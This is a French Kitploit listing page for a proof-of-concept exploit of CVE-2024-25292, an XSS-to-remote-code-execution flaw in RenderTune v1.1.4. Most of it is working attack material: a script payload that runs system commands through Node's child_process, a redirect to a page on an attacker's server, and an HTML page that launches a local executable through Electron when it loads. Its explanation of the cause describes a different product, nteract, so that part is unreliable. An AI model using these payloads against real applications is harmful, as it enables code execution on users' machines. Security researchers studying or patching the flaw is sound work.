Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25292 — XSS to RCE in RenderTune v1.1.4 exploit | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2024-25292
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

XSS to RCE in RenderTune v1.1.4 exploit

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RenderTune RCE

Une preuve de concept pour la vulnérabilité CVE-2024-25292.

Une vulnérabilité de type cross-site scripting (XSS) dans RenderTune v1.1.4 permet à des attaquants d'exécuter des scripts web ou du HTML arbitraires via une charge utile injectée dans le paramètre Upload Title. Dans ce dépôt se trouvent un exemple d'application vulnérable et une preuve de concept (POC) de l'exploitation.

En tant que PoC, un fichier Python automatise le processus.

1. Aperçu de la vulnérabilité :

Il s'agit d'une vulnérabilité qui permet une exécution de code à distance (RCE) via XSS. Il existe une partie du titre capable de XSS, donc c'est une vulnérabilité qui permet une RCE via la syntaxe NodeJS à travers la syntaxe XSS.


2. Cause de la vulnérabilité :

  • nteract 0.28.0 permet une vue web Electron via un lien Markdown, avec une exécution de code à distance résultante (car nodeIntegration dans webPreferences est true).
  • Explication de l'exploitation
    • Lors de la génération de liens via Markdown dans l'application, cela crée une WebView via Electron, permettant un accès externe au lien. Par conséquent, un attaquant peut réaliser une exécution de code à distance (RCE) en se connectant au lien menant au serveur de l'attaquant.

Preuve de concept (POC)

Cas 1) XSS vers RCE.

Étape 1) Confirmer que le XSS se produit dans la partie titre ※ À ce stade, l'élément Upload ne sera pas enregistré sauf si une image est jointe

root@kitploit:~
<b>jruru</b>

1

Étape 2) Par conséquent, il est configuré pour utiliser le XSS afin d'exécuter des commandes système NodeJS.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

Cas 2) Attaques via un serveur attaquant

※ Lorsque vous tentez une attaque avec window.location, vous accédez automatiquement à la page définie à chaque exécution de l'application.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

Remarque : ※ Si vous souhaitez tester rapidement, créez un serveur sur le PC de l'attaquant avec le code suivant.

root@kitploit:~
$ python -m http.server 80
  • Code PoC
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Exécuter des scripts en utilisant les propriétés onclick directement sur la balise -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Définition de la fonction script
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Exécuter le script automatiquement lors du chargement de la page
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


Télécharger l’outil